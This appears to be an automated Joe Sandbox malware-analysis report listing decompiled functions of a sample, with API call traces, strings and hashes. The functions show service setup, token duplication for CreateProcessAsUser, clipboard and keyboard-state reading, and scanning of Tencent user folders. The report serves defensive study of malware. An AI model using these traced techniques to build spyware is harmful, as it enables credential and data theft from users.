                                                                    Similarity
                                                                    • API ID: DeleteOpenService$DirectoryFileManagerSystemexitlstrcat
                                                                    • String ID: .$D$Rsjshd fzfgkqcm$\$a$e$e$f$k$l$t$u$y
                                                                    • API String ID: 3392600227-1081949225
                                                                    • Opcode ID: 28d876264f97ccfa2923b9d42dad7beb551e81a6745ba88f4992f0cb51909809
                                                                    • Instruction ID: c22a01dc393668847851f56136fa3f06600cf10012881ae33b39abbd7e87e008
                                                                    • Opcode Fuzzy Hash: 28d876264f97ccfa2923b9d42dad7beb551e81a6745ba88f4992f0cb51909809
                                                                    • Instruction Fuzzy Hash: 4B110D7080839CEAFB0197E4CC4DBCDBFA95B11749F0880C4E284AA192C6BA5259C736
                                                                    Function 10001667 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 143COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SetupDiGetClassDevsA.SETUPAPI(00000000,PCI,00000000,00000006), ref: 10001689
                                                                    • SetupDiEnumDeviceInfo.SETUPAPI(00000000,00000000,?), ref: 100016AE
                                                                    • SetupDiGetDeviceRegistryPropertyA.SETUPAPI(00000000,0000001C,00000008,?,00000000,00000064,?), ref: 100016FC
                                                                    • GetLastError.KERNEL32 ref: 10001702
                                                                    • GetLastError.KERNEL32 ref: 10001704
                                                                    • GetLastError.KERNEL32 ref: 1000170B
                                                                    • LocalFree.KERNEL32(00000000), ref: 10001727
                                                                    • GetLastError.KERNEL32 ref: 10001748
                                                                    • _strcmpi.MSVCRT ref: 10001765
                                                                    • SetupDiSetClassInstallParamsA.SETUPAPI(00000000,0000001C,?,00000014), ref: 10001796
                                                                    • GetLastError.KERNEL32 ref: 100017A0
                                                                    • SetupDiCallClassInstaller.SETUPAPI(00000012,00000000,0000001C), ref: 100017A8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLastSetup$Class$Device$CallDevsEnumFreeInfoInstallInstallerLocalParamsPropertyRegistry_strcmpi
                                                                    • String ID: PCI${4D36E972-E325-11CE-BFC1-08002BE10318}
                                                                    • API String ID: 642159545-2021903297
                                                                    • Opcode ID: 054938dfe6a3f6d20ab800071a8eed7e19b8594135aad5d2dd55f3829458cd77
                                                                    • Instruction ID: 5221d74791923a7f40e25a3fd04af9b124186ef5fcdd9a6e8b2e96944c23c535
                                                                    • Opcode Fuzzy Hash: 054938dfe6a3f6d20ab800071a8eed7e19b8594135aad5d2dd55f3829458cd77
                                                                    • Instruction Fuzzy Hash: E8411D72A0422DAEEB11DBE1DC84FDEBBFCEB09790F504166F605E2054DB309A44CBA1
                                                                    Function 004110C1 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 116sleepregistryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • RegisterServiceCtrlHandlerA.ADVAPI32(10012FD4,1000918B), ref: 004110D7
                                                                    • Sleep.KERNEL32(000001F4), ref: 00411135
                                                                    • GetVersionExA.KERNEL32(?), ref: 0041114C
                                                                    • Sleep.KERNEL32(0000003C), ref: 00411175
                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041118B
                                                                    • wsprintfA.USER32 ref: 004111A4
                                                                    • CloseHandle.KERNEL32(00000000), ref: 004111BA
                                                                    • exit.MSVCRT ref: 004111D1
                                                                    • Sleep.KERNEL32(000001F4), ref: 0041121B
                                                                      • Part of subcall function 00410EDE: WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,1000C044,00411173), ref: 00410EF9
                                                                      • Part of subcall function 00410EDE: CloseHandle.KERNEL32(00000000,?,?,1000C044,00411173), ref: 00410F00
                                                                    • Sleep.KERNEL32(000001F4), ref: 0041125F
                                                                    • Sleep.KERNEL32(000001F4), ref: 0041129A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Sleep$CloseHandle$CtrlFileHandlerModuleNameObjectRegisterServiceSingleVersionWaitexitwsprintf
                                                                    • String ID: Rsjshd fzfgkqcm
                                                                    • API String ID: 3641833367-3753134293
                                                                    • Opcode ID: 38dbba103b8c40cf8ea751231ac1e72af01c2f5a352f21008b732a6ba94cab33
                                                                    • Instruction ID: fd2b120b4fc6690d88fcffe129d916c3725f2caf03789538dd5a6798ecc00858
                                                                    • Opcode Fuzzy Hash: 38dbba103b8c40cf8ea751231ac1e72af01c2f5a352f21008b732a6ba94cab33
                                                                    • Instruction Fuzzy Hash: 64413C71505328EFF7109F50CD88F977A79EB1535BF88405AE208AF1A0C7BA8884CFA4
                                                                    Function 0040CB7D Relevance: 19.7, APIs: 13, Instructions: 157keyboardsleepstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: State$memset$AsyncSleeplstrlen
                                                                    • String ID:
                                                                    • API String ID: 2124264721-0
                                                                    • Opcode ID: f7b00ed52e65a6ad86fd6f30d77661969ed8bac0c82b702656f3d6f047290f55
                                                                    • Instruction ID: 5595caee0828672a794d0883c5a33027727b91ff7973cea1771655f4e09a715d
                                                                    • Opcode Fuzzy Hash: f7b00ed52e65a6ad86fd6f30d77661969ed8bac0c82b702656f3d6f047290f55
                                                                    • Instruction Fuzzy Hash: DD51F7B1804728EBEB10AFA4DDC8BDA7779EF44305F1042B7E50AB31C1D7388A459B59
                                                                    Function 1000140B Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 82stringfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 1000143A
                                                                    • strcpy.MSVCRT(?,?), ref: 10001464
                                                                    • strcat.MSVCRT(?,\Tencent\Users\*.*,?,?), ref: 10001475
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 1000148B
                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 100014A1
                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 100014AB
                                                                    • strcat.MSVCRT(?,10012020), ref: 100014C6
                                                                    • strlen.MSVCRT ref: 100014D2
                                                                    • memcpy.MSVCRT(100141A0,?,00000000,?,?,10012020), ref: 100014E6
                                                                    • strlen.MSVCRT ref: 100014F2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileFind$Nextstrcatstrlen$FirstFolderPathSpecialmemcpystrcpy
                                                                    • String ID: \Tencent\Users\*.*
                                                                    • API String ID: 32453827-2867266411
                                                                    • Opcode ID: 0e9ed596772dea9435d2b6d5cb19268fceceabfd9ed7487ab96d6fb6ccadf9c7
                                                                    • Instruction ID: d8db5fde510372d23f86df106748315c5a8d19b761381b980c5ae1831a61d9d8
                                                                    • Opcode Fuzzy Hash: 0e9ed596772dea9435d2b6d5cb19268fceceabfd9ed7487ab96d6fb6ccadf9c7
                                                                    • Instruction Fuzzy Hash: AC2177B390021C6BEB11DBA0CC85FDE77BCEB09740F0005E2E709E6155EA74AB888E61
                                                                    Function 00410FA6 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 103processCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • memset.MSVCRT ref: 00410FE5
                                                                    • memset.MSVCRT ref: 00410FF1
                                                                    • GetCurrentProcess.KERNEL32 ref: 00411013
                                                                    • OpenProcessToken.ADVAPI32(00000000,000F01FF,?), ref: 00411023
                                                                    • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?), ref: 0041103A
                                                                    • SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 00411063
                                                                    • CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000430,?,00000000,00000044,?), ref: 0041108F
                                                                    • FreeLibrary.KERNEL32(?), ref: 004110B4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessToken$memset$CreateCurrentDuplicateFreeInformationLibraryOpenUser
                                                                    • String ID: D
                                                                    • API String ID: 578660257-2746444292
                                                                    • Opcode ID: 253597a001000e577f99565faad50eba916f5472f64ec596e2b0885566f29c30
                                                                    • Instruction ID: e7405c07e7ce0f5ff3362315ff69bab1206dc4577edd43b4b48e0494b544edec
                                                                    • Opcode Fuzzy Hash: 253597a001000e577f99565faad50eba916f5472f64ec596e2b0885566f29c30
                                                                    • Instruction Fuzzy Hash: 8831D4B1D0122DEADB10EBE5CC89EDEBFBCEF09754F104016F205A6160D7B45A84DBA4
                                                                    Function 100058CF Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 77stringprocessCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • strlen.MSVCRT ref: 100058DD
                                                                    • memset.MSVCRT ref: 100058FB
                                                                      • Part of subcall function 1000A5CC: memset.MSVCRT ref: 1000A601
                                                                      • Part of subcall function 1000A5CC: memset.MSVCRT ref: 1000A614
                                                                      • Part of subcall function 1000A5CC: memset.MSVCRT ref: 1000A622
                                                                      • Part of subcall function 1000A5CC: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A62F
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 1000A647
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 1000A657
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 1000A667
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 1000A674
                                                                      • Part of subcall function 1000A5CC: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 1000A681
                                                                      • Part of subcall function 1000A5CC: RegOpenKeyExA.KERNEL32(?,00000000,00000000,00020019,?,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A69F
                                                                      • Part of subcall function 1000A5CC: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,75A78400,00000000), ref: 1000A80C
                                                                    • lstrlenA.KERNEL32(?), ref: 1000592A
                                                                    • strstr.MSVCRT ref: 10005940
                                                                    • lstrcpyA.KERNEL32(00000000,?), ref: 10005950
                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 10005996
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressProc$memset$Library$CreateFreeLoadOpenProcesslstrcpylstrlenstrlenstrstr
                                                                    • String ID: Applications\iexplore.exe\shell\open\command$D
                                                                    • API String ID: 1789527446-535818822
                                                                    • Opcode ID: 03b04116cd5e2f93a1c388b574af25df78561291c4e5abe51a4331dc8cba65a8
                                                                    • Instruction ID: ade4a931f4eb9cfd1acdee13523752f519e6b6ecf5cf36e0ff3093b8eebf7cde
                                                                    • Opcode Fuzzy Hash: 03b04116cd5e2f93a1c388b574af25df78561291c4e5abe51a4331dc8cba65a8
                                                                    • Instruction Fuzzy Hash: C7216072801228EAEB50DBE1DD48EDF7BBCEF453E2F100015FA05E6144DB759A85CBA0
                                                                    Function 00409850 Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Event
                                                                    • String ID:
                                                                    • API String ID: 4201588131-0
                                                                    • Opcode ID: fdab10a5c90b270ad0079631d783d4541f4e1c69ab3289e713f8659d37ba98c0
                                                                    • Instruction ID: 8fbbc46a2082f07138499ad3a4712ab5100e6d4067e54ab912e002d1de0c6dee
                                                                    • Opcode Fuzzy Hash: fdab10a5c90b270ad0079631d783d4541f4e1c69ab3289e713f8659d37ba98c0
                                                                    • Instruction Fuzzy Hash: C201CE326053652EF7203BA28C89EAF6B58DF47350F14403BF401A22D3CA7C4C42866F
                                                                    Function 10001804 Relevance: 13.6, APIs: 9, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4522065393.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                    • Associated: 00000000.00000002.4522050833.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522083539.000000001000C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4522100835.0000000010012000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Event
                                                                    • String ID:
                                                                    • API String ID: 4201588131-0
                                                                    • Opcode ID: fe4cecb07c818d34fbfdaafa4c52fc3d38e475ee1d7a847f0df858aff16f7476
                                                                    • Instruction ID: 7fceb321a988616d5766c36d8bb7e4aa9e85438ef3f497565498da9765883d79
                                                                    • Opcode Fuzzy Hash: fe4cecb07c818d34fbfdaafa4c52fc3d38e475ee1d7a847f0df858aff16f7476
                                                                    • Instruction Fuzzy Hash: E701A1396043556FF700A7A08C89EDB7BA9DF472D1F21802AF4429205ACF606E428777
                                                                    Function 00409457 Relevance: 9.1, APIs: 6, Instructions: 82stringfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,0000001A,00000000), ref: 00409486
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 004094D7
                                                                    • _mbscat.MSVCRT ref: 00409512
                                                                    • strlen.MSVCRT ref: 0040951E
                                                                    • memcpy.MSVCRT(100141A0,?,00000000,?,?,10012020), ref: 00409532
                                                                    • strlen.MSVCRT ref: 0040953E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: strlen$FileFindFirstFolderPathSpecial_mbscatmemcpy
                                                                    • String ID:
                                                                    • API String ID: 2947873918-0
                                                                    • Opcode ID: 49c7611cb49c1076721328d6f5764eb3c50a8c270976e230460b00990371f405
                                                                    • Instruction ID: b03a09a5f11923434ba7b1c586fecbcb86196ef0a9c8f209275e8ba57841d971
                                                                    • Opcode Fuzzy Hash: 49c7611cb49c1076721328d6f5764eb3c50a8c270976e230460b00990371f405
                                                                    • Instruction Fuzzy Hash: 372177B390021C6BDB22D7A5CD45FDE777CEB08704F0404E7E709E6151EA749B988E61
                                                                    Function 004093DE Relevance: 9.1, APIs: 6, Instructions: 51clipboardstringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • OpenClipboard.USER32(00000000), ref: 004093E9
                                                                    • GetClipboardData.USER32(00000001), ref: 004093F7
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00409400
                                                                    • strlen.MSVCRT ref: 0040941F
                                                                      • Part of subcall function 0040EA57: __EH_prolog.LIBCMT ref: 0040EA5C
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00409447
                                                                    • CloseClipboard.USER32 ref: 0040944D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.4520202775.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.4520188837.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000453000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520202775.000000000046D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520284954.0000000000470000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520303516.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520318154.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520333456.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520349043.0000000000490000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520396216.0000000000528000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520414829.000000000052D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520431885.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520449844.000000000052F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520467237.0000000000530000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520485427.0000000000531000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.4520512186.0000000000548000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
